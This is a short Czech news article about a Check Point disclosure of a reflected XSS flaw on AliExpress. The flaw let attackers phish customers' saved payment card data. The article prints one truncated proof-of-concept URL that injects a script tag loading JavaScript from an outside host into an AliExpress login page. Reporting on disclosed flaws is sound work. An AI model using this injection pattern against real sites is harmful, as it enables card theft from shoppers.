30.11.2017

Útočníci slaví Vánoce na AliExpressu

Většina z nás tráví předvánoční čas v internetových obchodech - ať už nás tam táhne výběr vánočních dárků nebo nákup na svátky. To si uvědomují i útočníci, kteří tam také tráví svůj předvánoční čas. Dárky však nenakupují.

Cover

Odborníci z bezpečnostní firmy CheckPoint narazili na zranitelnost v internetovém obchodu AliExpress, kterou útočníci cílili na blížící se předvánoční nákupy a díky níž mohli od důvěřivých uživatelů velmi přesvědčivou metodou získat potřebné soukromé údaje o jejich platebních kartách.

Na začátku všeho byl dobrý úmysl řetězce AliExpress, který pobízel své zákazníky k tomu, aby si ve svém profilu trvale uložili údaje o své platební kartě. Pobídka zřejmě vzešla z nějaké interní studie, která vyhodnotila, že takoví zákazníci pak nakupují mnohem ochotněji. Spolu s bezpečnostní mezerou ve svém systému však řetězec nevědomě umožnil, aby tyto údaje byli schopni převzít případní útočníci.

Útočník tedy může rozeslat emailovou zprávu s odkazem (viz níže), který sice směřuje na legitimní stránku e-shopu, avšak nese si s sebou škodlivý kód, který následně legitimní stránku upraví pro potřeby útočníka. Oběť tedy sice zadá údaje o své kartě na legitimní stránce, avšak i přesto budou odeslány útočníkovi.

https://login.aliexpress.com/havana_login_check.ht... type='text/javascript' src="https://gmailtracker.com/poc.js">


Kód výše využívá XSS zranitelnost serveru AliExpress. E-shop sice má základní ochranu proti XSS, tedy proti spouštění škodlivého kódu z cizích domén, kód z vlastní domény však spouští bez kontroly, čehož využívá tzv. Reflektované XSS. Útočníkům tedy stačí najít stránku v rámci domény AliExpress.com, která jejich škodlivý kód přenese s sebou, a tedy zvalidní.
Více na research.checkpoint.com

Kam dál?